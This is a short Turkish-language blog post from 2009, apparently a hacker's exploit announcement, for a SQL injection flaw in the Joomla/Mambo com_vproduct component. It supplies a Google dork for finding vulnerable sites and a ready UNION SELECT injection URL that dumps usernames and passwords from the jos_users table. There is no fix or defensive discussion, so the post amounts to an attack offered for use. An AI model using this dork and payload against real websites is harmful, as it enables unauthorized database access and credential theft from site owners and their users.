12 Aralık 2009 Cumartesi

Joomla / Mambo com_vproduct SQL İNJECTİON

Acıgı Bulan : ByEge
Acık Türü : SQL İNJECTİON..
Site : h4ckz.com
Blog : byege.blogspot.com

google dork : inurl:com_vproduct

http:/localhost/index.php?option=com_vproduct&Itemid=27&pid=13inj code. ??


http:/localhost/index.php?option=com_vproduct&Itemid=27&pid=13+and+1=1+UNION SELECT 1,concat(username,0x3D,password),3,4 from jos_users

Hiç yorum yok :

Yorum Gönderme